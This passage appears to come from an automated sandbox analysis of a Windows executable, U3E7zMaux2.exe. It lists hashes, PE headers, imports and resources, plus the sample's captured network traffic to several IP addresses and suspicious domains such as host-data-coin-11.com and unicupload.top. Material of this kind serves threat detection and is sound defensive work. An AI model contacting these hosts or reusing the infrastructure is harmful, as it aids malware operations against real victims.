                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:U3E7zMaux2.exe
                                                                                                                                                                                                        File size:294400
                                                                                                                                                                                                        MD5:8362e0f91ae3379c73422bbca7bac493
                                                                                                                                                                                                        SHA1:ec761f77bbe9900aed7ffa0a9303dc6801a9effb
                                                                                                                                                                                                        SHA256:adfea20237be615461c44fea423d6043fc74bf1c5303ee33fcecd8acd201291e
                                                                                                                                                                                                        SHA512:a509f836e79276e35ee721aeb596214550e410753a122ce254cb3943eda371713a9fe597717471bc13d884b497d767c393715c4224777f725c4f3ebed9286cab
                                                                                                                                                                                                        SSDEEP:3072:Uv7CHCUfMX34IHHW1UJNZoVkzUl1V9gALVggjcGkNIVqI:UvByIIIW1UJNZo/VV7ITsq
                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L......`...........

                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                        Icon Hash:acec36b6b694c6e2

                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Entrypoint:0x403360
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                                                        Time Stamp:0x60A40BAC [Tue May 18 18:47:08 2021 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:996fe7decbf39b8813e0892e829e72ad

                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        call 00007FAFC073B26Ch
                                                                                                                                                                                                        jmp 00007FAFC073557Dh
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                        test ecx, 00000003h
                                                                                                                                                                                                        je 00007FAFC0735726h
                                                                                                                                                                                                        mov al, byte ptr [ecx]
                                                                                                                                                                                                        add ecx, 01h
                                                                                                                                                                                                        test al, al
                                                                                                                                                                                                        je 00007FAFC0735750h
                                                                                                                                                                                                        test ecx, 00000003h
                                                                                                                                                                                                        jne 00007FAFC07356F1h
                                                                                                                                                                                                        add eax, 00000000h
                                                                                                                                                                                                        lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                                                        lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                                                        mov eax, dword ptr [ecx]
                                                                                                                                                                                                        mov edx, 7EFEFEFFh
                                                                                                                                                                                                        add edx, eax
                                                                                                                                                                                                        xor eax, FFFFFFFFh
                                                                                                                                                                                                        xor eax, edx
                                                                                                                                                                                                        add ecx, 04h
                                                                                                                                                                                                        test eax, 81010100h
                                                                                                                                                                                                        je 00007FAFC07356EAh
                                                                                                                                                                                                        mov eax, dword ptr [ecx-04h]
                                                                                                                                                                                                        test al, al
                                                                                                                                                                                                        je 00007FAFC0735734h
                                                                                                                                                                                                        test ah, ah
                                                                                                                                                                                                        je 00007FAFC0735726h
                                                                                                                                                                                                        test eax, 00FF0000h
                                                                                                                                                                                                        je 00007FAFC0735715h
                                                                                                                                                                                                        test eax, FF000000h
                                                                                                                                                                                                        je 00007FAFC0735704h
                                                                                                                                                                                                        jmp 00007FAFC07356CFh
                                                                                                                                                                                                        lea eax, dword ptr [ecx-01h]
                                                                                                                                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                        sub eax, ecx
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        lea eax, dword ptr [ecx-02h]
                                                                                                                                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                        sub eax, ecx
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        lea eax, dword ptr [ecx-03h]
                                                                                                                                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                        sub eax, ecx
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        lea eax, dword ptr [ecx-04h]
                                                                                                                                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                        sub eax, ecx
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                        sub esp, 20h
                                                                                                                                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                        push esi
                                                                                                                                                                                                        push edi
                                                                                                                                                                                                        push 00000008h
                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                        mov esi, 0041328Ch
                                                                                                                                                                                                        lea edi, dword ptr [ebp-20h]
                                                                                                                                                                                                        rep movsd
                                                                                                                                                                                                        mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                        mov eax, dword ptr [ebp+0Ch]
                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                        mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                        je 00007FAFC073570Eh
                                                                                                                                                                                                        test byte ptr [eax], 00000008h

                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                        • [ C ] VS2008 build 21022
                                                                                                                                                                                                        • [LNK] VS2008 build 21022
                                                                                                                                                                                                        • [ASM] VS2008 build 21022
                                                                                                                                                                                                        • [IMP] VS2005 build 50727
                                                                                                                                                                                                        • [RES] VS2008 build 21022
                                                                                                                                                                                                        • [C++] VS2008 build 21022

                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x180880x28.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x420000xdc88.rsrc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x131e00x1c.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x173880x40.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x130000x18c.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                        Sections

                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                        .text0x10000x11fc60x12000False0.612263997396data6.70078106144IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .rdata0x130000x596e0x5a00False0.457204861111data5.66671030744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .data0x190000x282780x22200False0.254006410256data2.80829340035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .rsrc0x420000xdc880xde00False0.68262598536data6.37784764366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                        Resources

                                                                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                        RT_CURSOR0x4eff00x130dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x425d00xea8dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x434780x8a8dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x43d200x6c8dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x443e80x568GLS_BINARY_LSB_FIRSTBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x449500x25a8dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x46ef80x10a8dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x47fa00x988dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x489280x468GLS_BINARY_LSB_FIRSTBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x48e080xea8dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x49cb00x8a8dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x4a5580x568GLS_BINARY_LSB_FIRSTBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x4aac00x25a8dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x4d0680x10a8dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x4e1100x988dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ICON0x4ea980x468GLS_BINARY_LSB_FIRSTBulgarianBulgaria
                                                                                                                                                                                                        RT_DIALOG0x4f2f00x72dataBulgarianBulgaria
                                                                                                                                                                                                        RT_STRING0x4f3680x452dataBulgarianBulgaria
                                                                                                                                                                                                        RT_STRING0x4f7c00x1ecdataBulgarianBulgaria
                                                                                                                                                                                                        RT_STRING0x4f9b00x2d4dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ACCELERATOR0x4ef680x60dataBulgarianBulgaria
                                                                                                                                                                                                        RT_ACCELERATOR0x4efc80x28dataBulgarianBulgaria
                                                                                                                                                                                                        RT_GROUP_CURSOR0x4f1200x14dataBulgarianBulgaria
                                                                                                                                                                                                        RT_GROUP_ICON0x48d900x76dataBulgarianBulgaria
                                                                                                                                                                                                        RT_GROUP_ICON0x4ef000x68dataBulgarianBulgaria
                                                                                                                                                                                                        RT_VERSION0x4f1380x1b8COM executable for DOSBulgarianBulgaria

                                                                                                                                                                                                        Imports

                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                        KERNEL32.dllSetLocaleInfoA, GetConsoleAliasesLengthW, VirtualQuery, GetDefaultCommConfigW, OpenJobObjectA, ReadConsoleA, GetConsoleAliasA, InterlockedDecrement, GetProfileSectionA, SetComputerNameW, GetTimeFormatA, GetConsoleAliasesA, GetConsoleTitleA, SetFileTime, FindResourceExA, Sleep, GetFileAttributesW, SetComputerNameExW, RaiseException, GetLongPathNameW, GetProcAddress, VirtualAlloc, GetAtomNameA, LocalAlloc, DnsHostnameToComputerNameA, GetFileType, GetModuleFileNameA, CreateIoCompletionPort, SetConsoleTitleW, GetModuleHandleA, GetStringTypeW, GetVersionExA, ReadConsoleInputW, EnumSystemLocalesW, CreateThread, HeapAlloc, GetCommandLineA, GetStartupInfoA, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, HeapFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualFree, HeapReAlloc, HeapCreate, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, SetFilePointer, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, LoadLibraryA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CreateFileA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, SetEndOfFile, GetProcessHeap, ReadFile, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW

                                                                                                                                                                                                        Version Infos

                                                                                                                                                                                                        DescriptionData
                                                                                                                                                                                                        ProjectVersion3.10.70.57
                                                                                                                                                                                                        InternationalNamebomgvioci.iwa
                                                                                                                                                                                                        CopyrightCopyrighz (C) 2021, fudkort
                                                                                                                                                                                                        Translation0x0129 0x0794

                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                        BulgarianBulgaria

                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.470151901 CET4977880192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.521605015 CET804977893.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.521702051 CET4977880192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.521838903 CET4977880192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.521861076 CET4977880192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.573570967 CET804977893.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.573594093 CET804977893.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.603110075 CET804977893.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.603188038 CET4977880192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.604227066 CET4977880192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.656111956 CET804977893.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.927566051 CET4977980192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.977960110 CET804977993.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.978058100 CET4977980192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.978221893 CET4977980192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.978235960 CET4977980192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.029314041 CET804977993.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.060883045 CET804977993.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.064419985 CET4977980192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.064462900 CET4977980192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.115184069 CET804977993.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.402857065 CET4978080192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.453427076 CET804978093.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.454916954 CET4978080192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.455013990 CET4978080192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.455030918 CET4978080192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.505327940 CET804978093.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.534573078 CET804978093.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.534755945 CET4978080192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.540623903 CET4978080192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.576316118 CET4978180192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.590818882 CET804978093.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.626808882 CET804978193.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.629986048 CET4978180192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.630038977 CET4978180192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.630049944 CET4978180192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.680416107 CET804978193.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.713572979 CET804978193.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.713860035 CET4978180192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.714227915 CET4978180192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.764363050 CET804978193.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.040339947 CET4978280192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.092287064 CET804978293.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.092402935 CET4978280192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.092550993 CET4978280192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.092581987 CET4978280192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.144453049 CET804978293.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.174699068 CET804978293.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.174803019 CET4978280192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.175084114 CET4978280192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.226660967 CET804978293.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.474669933 CET4978380192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.525158882 CET804978393.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.525341034 CET4978380192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.525396109 CET4978380192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.525404930 CET4978380192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.575768948 CET804978393.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.606343031 CET804978393.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.606437922 CET4978380192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.606723070 CET4978380192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.614815950 CET4978480192.168.2.4185.186.142.166
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.656753063 CET804978393.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.671371937 CET8049784185.186.142.166192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:11.175755024 CET4978480192.168.2.4185.186.142.166
                                                                                                                                                                                                        Jan 14, 2022 00:15:11.232177019 CET8049784185.186.142.166192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:11.738311052 CET4978480192.168.2.4185.186.142.166
                                                                                                                                                                                                        Jan 14, 2022 00:15:11.795569897 CET8049784185.186.142.166192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.091588974 CET4978580192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.142396927 CET804978593.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.142576933 CET4978580192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.142690897 CET4978580192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.142770052 CET4978580192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.193290949 CET804978593.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.222579956 CET804978593.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.222661972 CET4978580192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.223427057 CET4978580192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.253673077 CET4978680192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.274051905 CET804978593.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.305795908 CET804978693.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.305911064 CET4978680192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.306103945 CET4978680192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.306129932 CET4978680192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.358078957 CET804978693.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.404050112 CET804978693.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.406548977 CET4978680192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.406733990 CET4978680192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.447854996 CET4978780192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.458678007 CET804978693.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.498548031 CET804978793.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.499403954 CET4978780192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.499583960 CET4978780192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.558315992 CET804978793.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.558408022 CET804978793.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.558480978 CET804978793.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.558494091 CET4978780192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.558552980 CET804978793.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.558619022 CET4978780192.168.2.493.189.42.167
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.558624983 CET804978793.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.558769941 CET804978793.189.42.167192.168.2.4
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.558840990 CET804978793.189.42.167192.168.2.4

                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.165779114 CET192.168.2.48.8.8.80x1e78Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.615135908 CET192.168.2.48.8.8.80x7eb5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.073154926 CET192.168.2.48.8.8.80xbc1cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.557881117 CET192.168.2.48.8.8.80x8fbaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.726715088 CET192.168.2.48.8.8.80xf7efStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.185842037 CET192.168.2.48.8.8.80xdd6eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:11.804354906 CET192.168.2.48.8.8.80x4665Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.231695890 CET192.168.2.48.8.8.80x96b7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.427944899 CET192.168.2.48.8.8.80x550fStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:14.237322092 CET192.168.2.48.8.8.80xcfaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:14.409171104 CET192.168.2.48.8.8.80xa3f6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:14.572695971 CET192.168.2.48.8.8.80x786bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:15.171166897 CET192.168.2.48.8.8.80xe925Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:15.352641106 CET192.168.2.48.8.8.80x9efbStandard query (0)privacy-tools-for-you-780.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:17.959861994 CET192.168.2.48.8.8.80x644fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:18.142793894 CET192.168.2.48.8.8.80x60c7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:18.631000996 CET192.168.2.48.8.8.80x9905Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:18.719808102 CET192.168.2.48.8.8.80x4acbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:19.382601023 CET192.168.2.48.8.8.80xa2b4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:19.582433939 CET192.168.2.48.8.8.80x1c8cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:20.064352989 CET192.168.2.48.8.8.80xc340Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:20.237083912 CET192.168.2.48.8.8.80x2005Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.403347015 CET192.168.2.48.8.8.80x5113Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.567151070 CET192.168.2.48.8.8.80x9be3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.737056971 CET192.168.2.48.8.8.80xdd94Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.901120901 CET192.168.2.48.8.8.80x4237Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:24.925096989 CET192.168.2.48.8.8.80xac12Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.083369970 CET192.168.2.48.8.8.80x65dbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.277966976 CET192.168.2.48.8.8.80xd16aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.443576097 CET192.168.2.48.8.8.80x2be3Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:27.139034986 CET192.168.2.48.8.8.80xe05Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:27.313374996 CET192.168.2.48.8.8.80xc920Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
